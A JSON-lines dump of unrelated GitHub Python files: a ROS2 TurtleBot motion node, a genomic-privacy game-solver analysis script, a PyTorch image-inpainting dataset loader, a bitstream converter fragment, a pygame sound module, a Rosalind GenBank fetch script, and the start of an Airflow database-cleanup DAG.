constructor\n # call the class constructor\n super().__init__('example36')\n # create the publisher object\n self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n # create the subscriber object\n self.subscriber = self.create_subscription(LaserScan, '/scan', self.move_turtlebot, QoSProfile(depth=10, reliability=ReliabilityPolicy.BEST_EFFORT))\n # prevent unused variable warning\n self.subscriber\n # define the timer period for 0.5 seconds\n self.timer_period = 0.5\n # define the variable to save the received info\n self.laser_forward = 0\n # create a Twist message\n self.cmd = Twist()\n self.timer = self.create_timer(self.timer_period, self.motion)\n self.age = Age()\n\n def move_turtlebot(self,msg):\n # Save the frontal laser scan info at 0°\n self.laser_forward = msg.ranges[359] \n\n def motion(self):\n self.get_logger().info('I receive: \"%s\"' % str(self.laser_forward))\n # Read the first distance until fin a wall\n if self.laser_forward > 5:\n self.cmd.linear.x = 0.5\n self.cmd.angular.z = 0.5\n # Wall founded, it's time go go straight\n elif self.laser_forward <5 and self.laser_forward>=0.5:\n self.cmd.linear.x = 0.2\n self.cmd.angular.z = 0.0\n \n # be careful you have to stop. 
\n \n else:\n self.cmd.linear.x = 0.0\n self.cmd.angular.z = 0.0\n\n self.publisher_.publish(self.cmd)\n\n def on_shutdown(self):\n self.age.years = 2021.0\n self.age.months = 5.0\n self.age.days = 21.0\n self.get_logger().info('date this program was made : %s' % self.age.days + '/%s' % self.age.months +'/%s' % self.age.years)\n \ndef main(args=None):\n # initialize the ROS communication\n rclpy.init(args=args)\n # declare the node constructor\n example36 = Example36()\n \n # pause the program execution, waits for a request to kill the node (ctrl+c)\n rclpy.get_default_context().on_shutdown(example36.on_shutdown)\n try:\n rclpy.spin(example36)\n except KeyboardInterrupt:\n pass\n # Explicity destroy the node\n \n # shutdown the ROS communication\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()","repo_name":"Mondiegus/ROS2","sub_path":"basics/g3_services/ros2_ws/src/exercise36_pkg/exercise36_pkg/example36.py","file_name":"example36.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43572127162","text":"# Multi-Stage Re-Identification (MSRI) Game Solver (GS) v1.1\r\n# Component: MSRIGS Analysis on Usefulness and Fairness Using Simulated Datasets\r\n# Copyright 2018-2021 Zhiyu Wan, HIPLAB, Vanderilt University\r\n# Compatible with python 3.8.5. Package dependencies: Numpy 1.19.1, Scikit-learn 0.23.2, Pandas 1.1.3, Matplotlib 3.3.1,\r\n# Seaborn 0.11.0, and SciPy 1.5.2\r\n# Update history:\r\n# April 25, 2021: Add sharing rate function\r\n# May 11, 2021: Fix bugs about weighted_entropy for stat types 14, 15.2, and 15.3.\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os.path\r\nimport msrigs_functions as sf\r\nfrom scipy.stats import entropy\r\nfrom scipy.stats import skew\r\nfrom scipy.special import rel_entr\r\nfrom scipy.stats import pearsonr\r\nfrom scipy.stats import spearmanr\r\nfrom scipy.stats import wasserstein_distance\r\nfrom self_implemented_distance import variational_distance, earth_movers_distance\r\n\r\n# configuration\r\nid_exp = '2058' # ID for the set of experiments\r\nn_S = 1000 # size of the sensitive dataset (<=90000) (default: 1000)\r\nstart_iter = 0 # start from a particular iteration (default: 0)\r\nn_iter = 100 # (default: 100)\r\nmethod = 2 # (default: 2)\r\nm_g = 12 # (<=16) (default: 12)\r\nweight = np.concatenate((np.ones(2) * 1, np.ones(m_g)), axis=None)\r\nmissing_level = 0.3 # (default: 0.3)\r\nover_confident = 0 # (default: 0)\r\nalter_weight = 0 # *0: Based on information entropy. 1: Uniform. 2: Special (the weight of 1st 2 geno features is 10x).\r\nalgorithm = 1 # *0: greedy algorithm. 1: brute-force algorithm.\r\npruning = 1 # (default: 1)\r\n\r\n# choose a type for statistics\r\nstat_type = 14 # 1:sharing rate, 2:number of distinct values, 3:entropy, 4:mean, 5:std, 6:skewness, 7:gini, 8:min, 9:Q1,\r\n# 10:median, 11:Q3, 12:max, 13:KL divergence, 13.2:variational distance, 13.3:Earth mover’s distance (EMD),\r\n# 14:pearson/spearman, 15:group-wise KL divergence, 15.2:group-wise variational distance, 15.3:group-wise Earth mover’s distance.\r\n# 15.5:group-wise payoff, 15.6:group-wise privacy, 15.7:group-wise utility, 15.8: sharing rate\r\n\r\n# choose a scenario\r\n#scenario = 5 # 0: no protection. 1: no genomic data sharing. 2: random opt-in. 3: random masking. 3.1: custom masking.\r\n# 4: opt-in game. 5: masking game. 6: no-attack masking game. 
7: one-stage masking game.\r\n\r\n# setting for stat_type 15\r\n#explicit_usage = 0\r\n#targeted_attribute = 1 # 0:Birth year, 1:State\r\n\r\nsave_iter = [False, False, False, False, False, True, False, False] # save iteration for each scenario\r\ncolumn_names = ['defender_optimal', 'privacy', 'utility']\r\n\r\n# creat folders\r\nfolder_result = 'Results' + id_exp + '/Violin'\r\nif over_confident == 0 and alter_weight == 0 and algorithm == 0:\r\n folder_result += '/m'+str(method) + '/'\r\nelif over_confident == 1 and alter_weight == 0 and algorithm == 0:\r\n folder_result += '_over_confident/m' + str(method) + '/'\r\nelif alter_weight != 0 and over_confident == 0 and algorithm == 0:\r\n folder_result += '_multi_weight_distributions/Alter_weight_' + str(alter_weight) + '/m' + str(method) + '/'\r\nelif algorithm == 1 and over_confident == 0 and alter_weight == 0:\r\n folder_result += '_bf/'\r\nelse:\r\n print('The configuration is not correct.')\r\nif pruning == 1:\r\n folder_result += 'pruning/'\r\n# check the existence of the directory\r\nfolders = folder_result.rstrip('/').split('/')\r\nfolder = ''\r\nfor folder_name in folders:\r\n folder += folder_name + '/'\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n\r\nif algorithm == 0:\r\n scenarios = [4, 3, 3.1, 0]\r\nelse:\r\n scenarios = [5]\r\n\r\nfor i_scenario in range(len(scenarios)):\r\n scenario = scenarios[i_scenario]\r\n for explicit_usage in range(2):\r\n for targeted_attribute in range(2):\r\n if stat_type < 14: # one-variable summary statistics\r\n a = np.empty([n_iter, 2+m_g+1])\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',',\r\n skip_header=1).astype(int)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',')\r\n for j in range(2+m_g):\r\n S1 = S[:, j]\r\n # From Age to Birth_year\r\n if j == 0:\r\n S1 = 2020-S1\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, j]\r\n S_output = S1[array_opt_strategy1 > 0]\r\n else:\r\n S_output = S1\r\n if stat_type == 1: # sharing rate\r\n S_stat = S_output.size/n_S\r\n S1_stat = S1.size/n_S\r\n elif stat_type == 2: # number of distinct values\r\n S_stat = np.unique(S_output).size\r\n S1_stat = np.unique(S1).size\r\n elif stat_type == 3: # entropy\r\n values, counts = np.unique(S_output, return_counts=True)\r\n S_stat = entropy(counts)\r\n values1, counts1 = np.unique(S1, return_counts=True)\r\n S1_stat = entropy(counts1)\r\n elif stat_type == 4: # mean\r\n S_stat = np.mean(S_output)\r\n S1_stat = np.mean(S1)\r\n elif stat_type == 5: # standard deviation\r\n S_stat = np.std(S_output)\r\n S1_stat = np.std(S1)\r\n elif stat_type == 6: # skewness\r\n S_stat = skew(S_output)\r\n S1_stat = skew(S1)\r\n elif stat_type == 7: # gini coefficient\r\n S_stat = sf.gini(S_output.astype(np.float))\r\n S1_stat = sf.gini(S1.astype(np.float))\r\n elif stat_type == 8: # min\r\n S_stat = np.amin(S_output)\r\n S1_stat = np.amin(S1)\r\n elif stat_type == 9: # Q1\r\n S_stat = np.quantile(S_output, .25)\r\n S1_stat = np.quantile(S1, .25)\r\n elif stat_type == 10: # median\r\n S_stat = np.median(S_output)\r\n S1_stat = np.median(S1)\r\n elif stat_type == 11: # Q3\r\n S_stat = np.quantile(S_output, .75)\r\n S1_stat = np.quantile(S1, .75)\r\n elif stat_type == 12: # 
max\r\n S_stat = np.amax(S_output)\r\n S1_stat = np.amax(S1)\r\n elif np.floor(stat_type) == 13: # KL divergence (relative entropy), or variational distance, or EMD\r\n values, counts = np.unique(S1, return_counts=True)\r\n counts2 = np.copy(counts)\r\n for k in range(values.size):\r\n counts2[k] = np.count_nonzero(S_output == values[k])\r\n if np.sum(counts2) == 0:\r\n S_stat = 1\r\n print('Undefined distance!')\r\n elif counts.size == 1:\r\n S_stat = 0\r\n print('One-point distribution!')\r\n else:\r\n p = counts/np.sum(counts)\r\n q = counts2/np.sum(counts2)\r\n if stat_type == 13: # reverse KL divergence\r\n S_stat = np.sum(rel_entr(q, p))\r\n elif stat_type == 13.2: # self-implemented variational distance\r\n S_stat = variational_distance(p, q)\r\n elif stat_type == 13.3: # self-implemented EMD\r\n t = (j == 1) + 0 # 0: numerical, 1: categorical\r\n S_stat = earth_movers_distance(p, q, t)\r\n elif stat_type == 13.4: # EMD in scipy\r\n S_stat = wasserstein_distance(p, q)\r\n else:\r\n S_stat = 0\r\n print('Invalid stat_type!')\r\n if np.floor(stat_type) < 13:\r\n if stat_type >= 4 and stat_type <= 12: # numerical attributes\r\n a[i, j] = np.abs(S_stat - S1_stat)\r\n else:\r\n a[i, j] = np.abs(S_stat - S1_stat) / S1_stat\r\n else:\r\n a[i, j] = S_stat\r\n # calculate weighted sum\r\n if stat_type >= 4 and stat_type <= 12: #numerical attributes\r\n a_temp = a[i, 0:(2 + m_g)]\r\n a_temp[1] = 0\r\n a[i, 2 + m_g] = np.sum(a_temp) / (a_temp.size - 1)\r\n else:\r\n a[i, 2 + m_g] = np.dot(a[i, 0:(2 + m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n filename = folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.txt'\r\n f = open(filename, 'w')\r\n array_output = np.empty([2, 2+m_g+1])\r\n for j in range(2+m_g+1):\r\n a1 = a[:, j]\r\n a1_mean = np.mean(a1)\r\n a1_std = np.std(a1)\r\n array_output[0, j] = a1_mean\r\n array_output[1, j] = a1_std\r\n print('j=' + str(j) + ': mean = ' + str(a1_mean) + ', SD= ' + str(a1_std))\r\n f.write('j=' + str(j) + ': mean = ' + str(a1_mean) + ', SD= ' + str(a1_std) + '\\n')\r\n f.close()\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.csv', array_output,\r\n delimiter=',')\r\n\r\n elif stat_type == 14: # two-variable summary statistics\r\n a = np.empty([n_iter, 2 + m_g, 2 + m_g])\r\n b = np.empty([n_iter, 2 + m_g + 1])\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',', skip_header=1)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(\r\n folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',')\r\n for j in range(2 + m_g):\r\n for k in range(2 + m_g):\r\n if j == k:\r\n S_stat = 0\r\n S1_stat = 0\r\n else:\r\n S1 = S[:, j]\r\n S2 = S[:, k]\r\n # From Age to Birth_year\r\n if j == 0:\r\n S1 = 2020 - S1\r\n if k == 0:\r\n S2 = 2020 - S2\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, j]\r\n array_opt_strategy2 = array_opt_strategy[:, k]\r\n S1_output = S1[np.logical_and(array_opt_strategy1 > 0, array_opt_strategy2 > 0)]\r\n S2_output = S2[np.logical_and(array_opt_strategy1 > 0, array_opt_strategy2 > 0)]\r\n else:\r\n S1_output = S1\r\n S2_output = S2\r\n if 
stat_type == 14: # pearson correlation\r\n if S1_output.size == 0 or S2_output.size == 0:\r\n S_stat, pval = 0, 0\r\n elif S1_output.size == 1 or S2_output.size == 1:\r\n S_stat, pval = 1, 0\r\n else:\r\n #S_stat, pval = pearsonr(S1_output, S2_output)\r\n S_stat, pval = spearmanr(S1_output, S2_output)\r\n if S1.size == 0 or S2.size == 0:\r\n S1_stat, pval1 = 0, 0\r\n elif S1.size == 1 or S2.size == 1:\r\n S1_stat, pval1 = 1, 0\r\n else:\r\n S1_stat, pval1 = spearmanr(S1, S2)\r\n else:\r\n S_stat, pval = 0, 0\r\n S1_stat, pval1 = 0, 0\r\n print('Invalid stat_type!')\r\n if np.isnan(np.abs(S_stat - S1_stat)):\r\n a[i, j, k] = 0\r\n else:\r\n a[i, j, k] = np.abs(S_stat - S1_stat)\r\n b[i, 0:(2+m_g)] = np.mean(a[i, :, :], axis=1) * 13\r\n b[i, 2+m_g] = np.dot(b[i, 0:(2+m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n filename = folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.txt'\r\n f = open(filename, 'w')\r\n avg_array_output = np.mean(b, axis=0)\r\n print(str(avg_array_output))\r\n f.write(str(avg_array_output))\r\n f.close()\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario) + '.csv', avg_array_output, delimiter=',')\r\n\r\n elif np.floor(stat_type) == 15: # one-variable summary statistics for each demographic group (one attribute)\r\n group_hr_birth_year = list(range(1910, 2000, 10)) # [1910, 1920, 1930, 1940, 1950, 1960, 1970, ..., 1990]\r\n group_hr_state = list(range(11, 51, 10)) # [11, 21, 31, 41]\r\n\r\n if targeted_attribute == 0:\r\n group_hr = group_hr_birth_year\r\n else:\r\n group_hr = group_hr_state\r\n n_groups = len(group_hr) + 1\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n a = np.zeros([n_iter, n_groups + 2, 2]) # [...] 
* [..., W_Avg, (1-Gini)] * [metric, size]\r\n if algorithm == 1 and scenario >= 5:\r\n folder_result = folder_result.replace('Violin/m' + str(method), 'Violin_bf')\r\n if stat_type < 15.8:\r\n if not save_iter[np.floor(scenario).astype(int)]:\r\n dataset = pd.read_pickle(folder_result + 'result_s' + str(scenario) + '.pickle')\r\n ii = np.round((stat_type - 15.5) * 10).astype(int)\r\n if save_iter[np.floor(scenario).astype(int)]:\r\n shaped_data = np.empty([n_iter, n_S])\r\n for k in range(n_iter): # for each iteration\r\n dataset = pd.read_pickle(folder_result + 'result_s' + str(scenario) + '_i' + str(k) + '.pickle')\r\n data = np.array(dataset[column_names[ii]])\r\n shaped_data[k, :] = data.reshape(1, -1)\r\n else:\r\n data = np.array(dataset[column_names[ii]])\r\n shaped_data = np.reshape(data, (n_iter, n_S))\r\n else: # utility for the dataset\r\n a = np.zeros([n_iter, n_groups + 5, 2 + m_g + 2]) # [.]*[., W_Avg, STD, Gini, Gini2, entropy]*[., W_Avg, size]\r\n # load target dataset\r\n for i in range(start_iter, start_iter + n_iter):\r\n S = np.genfromtxt(folder_result + 'target_data/i' + str(i) + '.csv', delimiter=',',\r\n skip_header=1).astype(int)\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv', delimiter=',')\r\n if scenario > 0:\r\n array_opt_strategy = np.genfromtxt(\r\n folder_result + 'opt_strategy/s' + str(scenario) + '_i' + str(i) + '.csv', delimiter=',').astype(int)\r\n elif scenario == 0:\r\n array_opt_strategy = np.ones([n_S, 2+m_g]).astype(int)\r\n S_targeted = S[:, targeted_attribute]\r\n # From Age to Birth_year\r\n if targeted_attribute == 0:\r\n S_targeted = 2020 - S_targeted\r\n memberships = np.copy(S_targeted)\r\n for j in range(n_S): # for each person\r\n index_group = 0\r\n for k in range(n_groups-1): # for each group (excluding the 1st)\r\n if S_targeted[j] < group_hr[k]:\r\n break\r\n else:\r\n index_group += 1\r\n memberships[j] = index_group\r\n\r\n for j in range(n_groups): # for each group\r\n selection = memberships == j\r\n # save group size\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n a[i, j, -1] = np.sum(np.logical_and(selection, array_opt_strategy_targeted > 0))\r\n else:\r\n a[i, j, -1] = np.sum(selection)\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n if np.sum(np.logical_and(selection, array_opt_strategy_targeted > 0)) == 0:\r\n print('group size is zero!')\r\n a[i, j, 0] = 0\r\n else:\r\n if stat_type == 15.8: # sharing rate\r\n a[i, j, 0] = np.mean(array_opt_strategy[\r\n np.logical_and(selection, array_opt_strategy_targeted > 0),\r\n :])\r\n else:\r\n a[i, j, 0] = np.mean(\r\n shaped_data[i, np.logical_and(selection, array_opt_strategy_targeted > 0)])\r\n\r\n else:\r\n if stat_type == 15.8: # sharing rate\r\n a[i, j, 0] = np.mean(array_opt_strategy[selection, :])\r\n else:\r\n a[i, j, 0] = np.mean(array_opt_strategy[selection, :])\r\n continue\r\n\r\n for k in range(2 + m_g): # for each attribute\r\n S1 = S[:, k]\r\n # From Age to Birth_year\r\n if k == 0:\r\n S1 = 2020 - S1\r\n if scenario > 0:\r\n array_opt_strategy1 = array_opt_strategy[:, k]\r\n if explicit_usage == 1: # explicit usage\r\n array_opt_strategy_targeted = array_opt_strategy[:, targeted_attribute]\r\n S_output = S1[np.logical_and.reduce((array_opt_strategy1 > 0, selection,\r\n array_opt_strategy_targeted > 0))] # 
shared data in this group\r\n else:\r\n S_output = S1[np.logical_and.reduce((array_opt_strategy1 > 0, selection))] # shared data in this group\r\n else: # no protection\r\n S_output = S1[selection]\r\n S1 = S1[selection] # original data in this group\r\n if np.floor(stat_type) == 15: # KL divergence\r\n values, counts = np.unique(S1, return_counts=True)\r\n counts2 = np.copy(counts)\r\n for kk in range(values.size):\r\n counts2[kk] = np.count_nonzero(S_output == values[kk])\r\n if np.sum(counts2) == 0:\r\n S_stat = 1\r\n print('Undefined distance!')\r\n elif counts.size == 1:\r\n S_stat = 0\r\n print('One-point distribution!')\r\n else:\r\n p = counts / np.sum(counts)\r\n q = counts2 / np.sum(counts2)\r\n if stat_type == 15: # reverse KL divergence\r\n S_stat = np.sum(rel_entr(q, p))\r\n elif stat_type == 15.2: # self-implemented variational distance\r\n S_stat = variational_distance(p, q)\r\n elif stat_type == 15.3: # self-implemented EMD\r\n t = (k == 1) + 0 # 0: numerical, 1: categorical\r\n S_stat = earth_movers_distance(p, q, t)\r\n elif stat_type == 15.4: # EMD in scipy\r\n S_stat = wasserstein_distance(p, q)\r\n else:\r\n S_stat = 0\r\n print('Invalid stat_type!')\r\n a[i, j, k] = S_stat\r\n\r\n # save analysis result\r\n if not os.path.exists(folder_result + 'analysis_result'):\r\n os.mkdir(folder_result + 'analysis_result')\r\n # computer statistics for each iteration\r\n for i in range(start_iter, start_iter + n_iter):\r\n if stat_type > 15.4: # additive utility, privacy, and payoff\r\n # calculate the weighted average\r\n a[i, n_groups, 0] = np.dot(a[i, 0:n_groups, 0], a[i, 0:n_groups, -1]) / np.sum(a[i, 0:n_groups, -1])\r\n a[i, n_groups + 1, 0] = 1 - sf.gini(a[i, 0:n_groups, 0]) # calculate the (1 - gini coefficient)\r\n a[i, n_groups, -1] = np.mean(a[i, 0:n_groups, -1]) # calculate the average\r\n a[i, n_groups + 1, -1] = 1 - sf.gini(a[i, 0:n_groups, -1]) # calculate the (1 - gini coefficient)\r\n else:\r\n weighted_entropy = np.genfromtxt(folder_result + 'weighted_entropy/i' + str(i) + '.csv',\r\n delimiter=',')\r\n for j in range(n_groups): # for each group\r\n # calculate the weighted_average\r\n a[i, j, 2+m_g] = np.dot(a[i, j, 0:(2+m_g)], weighted_entropy) / np.sum(weighted_entropy)\r\n for k in range(2 + m_g + 1): # for each attribute + 1\r\n # calculate the average\r\n a[i, n_groups, k] = np.dot(a[i, 0:n_groups, k], a[i, 0:n_groups, -1]) / np.sum(a[i, 0:n_groups, -1])\r\n a[i, n_groups + 1, k] = np.std(a[i, 0:n_groups, k]) # calculate the standard deviation\r\n a[i, n_groups + 2, k] = sf.gini(a[i, 0:n_groups, k]) # calculate the gini coefficient\r\n a[i, n_groups + 3, k] = sf.gini(1-a[i, 0:n_groups, k]) # calculate the gini coefficient of (1 - distance)\r\n a[i, n_groups, -1] = np.mean(a[i, 0:n_groups, -1]) # calculate the average\r\n a[i, n_groups + 1, -1] = np.std(a[i, 0:n_groups, -1]) # calculate the standard deviation\r\n a[i, n_groups + 2, -1] = sf.gini(a[i, 0:n_groups, -1]) # calculate the gini coefficient\r\n a[i, n_groups + 4, 0:(2 + m_g)] = weighted_entropy\r\n a[i, n_groups + 4, 2 + m_g] = np.mean(weighted_entropy)\r\n avg_array_output = np.mean(a, axis=0)\r\n np.savetxt(folder_result + 'analysis_result/type' + str(stat_type) + '_s' + str(scenario)\r\n + '_attr' + str(targeted_attribute) + '_exp' + str(explicit_usage) + '.csv',\r\n avg_array_output, 
delimiter=',')\r\n","repo_name":"zhywan/msrigs","sub_path":"msrigs_simulation_analysis_usefulness_and_fairness.py","file_name":"msrigs_simulation_analysis_usefulness_and_fairness.py","file_ext":"py","file_size_in_byte":26402,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"30796289743","text":"import os\nimport glob\nimport torch\n\nfrom ex4 import ex4\nimport random\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\n\nIMG_SHAPE = 100\nMIN_OFFSET = 0\nMAX_OFFSET = 8\nMIN_SPACING = 2\nMAX_SPACING = 6\nMIN_KNOWN_PIXELS = 144\n\nSPACING = [2, 3, 4, 5, 6]\nOFFSET = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n\n\nclass LoadImages(Dataset):\n def __init__(self, folder):\n self.input_abs = os.path.abspath(folder)\n self.files = []\n\n self.files = (os.path.join(f) for f in glob.glob(os.path.join(self.input_abs, '**', '*.jpg'), recursive=True))\n\n self.files = sorted(self.files)\n\n def __len__(self):\n return len(self.files)\n \n def __getitem__(self, idx):\n resize_transforms = transforms.Compose([\n transforms.Resize(size=IMG_SHAPE),\n transforms.CenterCrop(size=(IMG_SHAPE, IMG_SHAPE)),\n ])\n\n image = Image.open(self.files[idx]).convert('RGB')\n image = resize_transforms(image)\n\n image = np.array(image, dtype=np.float32)\n target, image_arr, known_arr, target_arr = ex4(image,\n (random.choice(OFFSET), random.choice(OFFSET)),\n (random.choice(SPACING), random.choice(SPACING)))\n\n image_arr = np.transpose(image_arr, (2, 0, 1))\n target = np.transpose(target, (2, 0, 1))\n\n return target, image_arr\n\n\ndef stack_with_padding(batch_as_list: list):\n n_samples = len(batch_as_list)\n \n image_shapes = np.stack([np.array(sample[0].shape) for sample in batch_as_list], axis=-1)\n max_image_shape = image_shapes.max(axis=-1)\n \n stacked_images = torch.full(size=(n_samples, *max_image_shape), dtype=torch.float32, fill_value=0.)\n for i in range(n_samples):\n stacked_images[i, :, :batch_as_list[i][0].shape[-2], :batch_as_list[i][0].shape[-1]] \\\n = torch.from_numpy(batch_as_list[i][0])\n\n targets_list = [torch.from_numpy(sample[1]) for sample in batch_as_list]\n ids_list = [sample[2] for sample in batch_as_list]\n return stacked_images, targets_list, ids_list\n\n\nif __name__ == '__main__':\n img_data = LoadImages('training/000')\n img_loader = DataLoader(img_data, shuffle=True, batch_size=5, collate_fn=stack_with_padding)\n\n for i, (inp, trg, ids) in enumerate(img_loader):\n print(f\"Batch {i}:\")\n print(f\"image ids: {ids}\")\n print(f\"batch shape: {inp.shape}\")","repo_name":"medisredzic/image-inpainting","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2242803075","text":"#!/usr/bin/python3.5\nimport binascii\nfrom crc32c import crc32\nimport struct\nimport time\nEND = 1605109\n\n\ndef timer(func):\n\t# decorator without parameter\n\tdef _timer():\n\t\tstart_time = time.time()\n\t\tfunc()\n\t\tend_time = time.time()\n\t\tprint(\"\\nTotal time: \" + str(end_time-start_time))\n\treturn _timer\n\n\ndef ascii2bin(start, end):\n\tcontent = b''\n\twith open(\"pin_test.rbt\", 'r') as f, open('out.bin', 'wb') as fw:\n\t\t# lines = f.readlines()\n\t\tfor line in f.readlines()[start:end]:\n\t\t\tbyte = struct.pack('= len(self._intensity_samples)\n\n def at(self, time_s):\n idx = int(time_s * self._sample_rate)\n if 
idx >= len(self._intensity_samples):\n return 0\n else:\n return self._intensity_samples[idx]\n\n\nclass IntensityValueSource(ValueSource):\n DELAY = 0\n\n def __init__(self, intensity):\n ValueSource.__init__(self)\n self._intensity = intensity\n self._start_time = self.current_time()\n\n def value(self):\n t = self.current_time() - self._start_time\n if t < IntensityValueSource.DELAY:\n return 0\n else:\n return self._intensity.at(t - IntensityValueSource.DELAY)\n\n def is_finished(self):\n return self._intensity.is_finished_at(self.current_time() - self._start_time)\n\n\n\ndef play_mp3(path):\n pygame.mixer.music.load(path)\n pygame.mixer.music.play()\n\n\ndef play(path, volume=1, stereo=None):\n sound = Clip(path, volume, stereo)\n sound.play()\n return sound\n\n\ndef max_channels():\n return pygame.mixer.get_num_channels()\n\n\ndef wait_until_end():\n while pygame.mixer.get_busy():\n time.sleep(0.2)\n\ndef set_master_volume(volume):\n global _master_volume\n _master_volume = volume\n #for clip in active_clips:\n # clip.update_channel_volume()\n","repo_name":"socha23/ecotron","sub_path":"sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13526500505","text":"# Given: Two GenBank IDs\n# Return: The maximum global alignment score between the DNA strings associated with the IDs\n\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\nwith open('rosalind_need.txt', 'r') as f:\n\tIDs = f.readline().strip().split()\n\nentrez_ids = ''\nfor a in IDs:\n\tentrez_ids += a + ', '\n\nEntrez.email = 'ada.alex.6@gmail.com'\nhandle = Entrez.efetch(db='nucleotide', id=[entrez_ids], rettype=\"fasta\")\nrecords = list (SeqIO.parse(handle, \"fasta\"))\n\n\n# Use this program to get the FASTA sequences and then use NEEDLE from EMBOSS website to\n# perform alignment\nfor record in records:\n\tprint(record.format('fasta'))","repo_name":"adamadejska/Rosalind","sub_path":"NEED.py","file_name":"NEED.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74401918031","text":"\"\"\"\nA maintenance workflow that you can deploy into Airflow to periodically clean\nout the DagRun, TaskInstance, Log, XCom, Job DB and SlaMiss entries, as well\n as task logs to avoid having too much data in your Airflow MetaStore and disc.\nairflow trigger_dag --conf '{\"maxDataAgeInDays\":30}' airflow-log-cleanup\n--conf options:\n maxDataAgeInDays: - Optional\n\"\"\"\nimport os\nimport logging\nfrom datetime import timedelta\nimport dateutil.parser\nimport airflow\nfrom airflow.models import (\n DagRun, TaskInstance, Log, XCom, SlaMiss,\n DagModel, Variable\n)\nfrom airflow.utils import timezone\nfrom airflow.jobs.job import Job\nfrom airflow import settings\nfrom airflow.operators.python import PythonOperator\nfrom sqlalchemy import func, and_\nfrom sqlalchemy.orm import load_only\n\nfrom data_pipeline.utils.dags.data_pipeline_dag_utils import create_dag\n\n\nDAG_ID = \"Airflow_DB_Maintenance\"\nSTART_DATE = airflow.utils.dates.days_ago(1)\nDB_MAINTENANCE_SCHEDULE_INTERVAL_ENV_NAME = (\n \"DB_MAINTENANCE_SCHEDULE_INTERVAL\"\n)\n# Whether the job should delete the db entries or not. Included if you want to\n# temporarily avoid deleting the db entries.\nENABLE_DELETE = True\n# List of all the objects that will be deleted. 
Comment out the DB objects you\n# want to skip.\nDATABASE_OBJECTS = [\n {\n \"airflow_db_model\": DagRun,\n \"age_check_column\": DagRun.execution_date,\n \"keep_last\": True,\n \"keep_last_filters\": [DagRun.external_trigger is False],\n \"keep_last_group_by\": DagRun.dag_id},\n {\n \"airflow_db_model\": TaskInstance,\n \"age_check_column\": TaskInstance.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": Log,\n \"age_check_column\": Log.dttm,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": XCom,\n \"age_check_column\": XCom.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": Job,\n \"age_check_column\": Job.latest_heartbeat,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": SlaMiss,\n \"age_check_column\": SlaMiss.execution_date,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n {\n \"airflow_db_model\": DagModel,\n \"age_check_column\": DagModel.last_parsed_time,\n \"keep_last\": False,\n \"keep_last_filters\": None,\n \"keep_last_group_by\": None\n },\n]\n# pylint: disable=invalid-name\nsession = settings.Session()\n\nDEFAULT_ARGS = {\n 'depends_on_past': False,\n 'email_on_failure': True,\n 'email_on_retry': False,\n 'start_date': START_DATE,\n 'retries': 1,\n 